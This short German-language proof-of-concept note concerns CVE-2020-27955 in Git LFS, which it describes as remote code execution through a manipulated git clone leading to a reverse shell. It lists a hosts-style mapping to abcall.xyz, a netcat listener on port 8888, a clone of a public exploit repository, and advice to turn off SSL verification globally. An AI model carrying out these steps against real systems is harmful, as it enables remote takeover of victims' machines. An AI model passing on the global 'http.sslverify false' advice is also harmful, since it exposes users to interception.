
Proof-of-Concept-Exploit für CVE-2020-27955 in Git-LFS, das Remote-Codeausführung über einen manipulierten git clone-Vorgang demonstriert, um eine Reverse Shell zu erhalten.
Download-Link: https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1
10.1.1.5 abcall.xyz
┌──(root㉿hostname)-[~]
└─# nc
Cmd line: -l -p 8888
git clone https://github.com/z50913/CVE-2020-27955.git
Falls ein SSL-Zertifikatsproblem gemeldet wird, kann man zuerst den folgenden Befehl eingeben, um die SSL-Validierung zu deaktivieren, und dann erneut klonen.
git config --global http.sslverify false